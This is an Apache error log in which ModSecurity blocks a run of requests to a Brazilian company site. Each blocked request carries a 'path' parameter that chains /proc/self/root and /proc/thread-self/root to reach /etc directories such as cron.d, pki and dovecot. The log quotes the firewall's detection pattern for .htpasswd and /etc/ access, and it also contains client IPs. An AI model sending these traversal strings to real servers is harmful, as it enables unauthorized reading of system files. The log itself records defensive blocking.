[Mon Mar 16 22:17:24.802733 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.243.203:36096] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirpKBJNF7axNlVR0W6sAAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:17:26.227269 2026] [:error] [pid 2304:tid 140411574073088] [client 74.7.243.203:36102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirpsh3JZxwdBQwPYGy0wAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:17:27.688840 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.203:36118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirp6BJNF7axNlVR0W6swAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:17:29.122963 2026] [:error] [pid 2325:tid 140411741927168] [client 74.7.243.203:36122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirqe82sZHvlq4xgHqBJgAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:17:43.121836 2026] [proxy_fcgi:error] [pid 29507:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54264] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:17:43.122148 2026] [log_config:warn] [pid 29507:tid 140411649607424] (32)Broken pipe: [client 179.188.53.243:54264] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:17:44.233638 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:48620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiruKBJNF7axNlVR0W6vQAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:18:05.105845 2026] [proxy_fcgi:error] [pid 29802:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54478] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:18:05.106168 2026] [log_config:warn] [pid 29802:tid 140411548894976] (32)Broken pipe: [client 179.188.53.243:54478] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:18:06.911611 2026] [:error] [pid 2304:tid 140411632822016] [client 74.7.243.203:59520] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirzsh3JZxwdBQwPYGy6AAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:18:09.642975 2026] [:error] [pid 2305:tid 140411582465792] [client 74.7.243.203:38014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir0QQohV2v-7oj5HG9PAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:18:10.867534 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.243.203:53034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir0u82sZHvlq4xgHqBUgAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:18:12.199784 2026] [:error] [pid 2304:tid 140411574073088] [client 74.7.243.203:53044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir1Mh3JZxwdBQwPYGy7gAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:18:16.348472 2026] [:error] [pid 2304:tid 140411733534464] [client 74.7.243.203:53052] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir2Mh3JZxwdBQwPYGy8gAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:18:27.125778 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54732] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:18:27.126103 2026] [log_config:warn] [pid 21805:tid 140411607643904] (32)Broken pipe: [client 179.188.53.243:54732] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:18:28.210883 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.241.46:43472] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir5O82sZHvlq4xgHqBZQAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:18:29.192818 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.243.203:49002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir5aBJNF7axNlVR0W62AAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:18:31.611169 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:56208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir56BJNF7axNlVR0W62wAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:18:32.412962 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.228.16:43416] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abir6KBJNF7axNlVR0W63gAAAAA"]
[Mon Mar 16 22:18:37.480281 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:56210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir7aBJNF7axNlVR0W66QAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:18:40.203741 2026] [:error] [pid 2305:tid 140411708356352] [client 74.7.243.203:56226] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir8AQohV2v-7oj5HG9SQAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:18:44.919599 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.244.31:37992] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abir9O82sZHvlq4xgHqBdAAAApc"]
[Mon Mar 16 22:18:47.550985 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:50616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir96BJNF7axNlVR0W69gAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:18:49.065801 2026] [proxy_fcgi:error] [pid 15568:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54966] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:18:49.066057 2026] [log_config:warn] [pid 15568:tid 140411658000128] (32)Broken pipe: [client 179.188.53.243:54966] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:18:53.041245 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.203:50622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abir_aBJNF7axNlVR0W6-wAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:18:58.308864 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.243.203:34454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abisAgQohV2v-7oj5HG9UwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:19:11.106089 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55208] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:19:11.106416 2026] [log_config:warn] [pid 21805:tid 140411708356352] (32)Broken pipe: [client 179.188.53.243:55208] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:19:18.449644 2026] [:error] [pid 2304:tid 140411733534464] [client 74.7.243.203:59778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abisFsh3JZxwdBQwPYGy_gAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:19:33.131031 2026] [proxy_fcgi:error] [pid 10772:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55380] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:19:33.131363 2026] [log_config:warn] [pid 10772:tid 140411574073088] (32)Broken pipe: [client 179.188.53.243:55380] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:19:40.316782 2026] [:error] [pid 2304:tid 140411733534464] [client 74.7.243.203:59778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abisLMh3JZxwdBQwPYGzDgAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
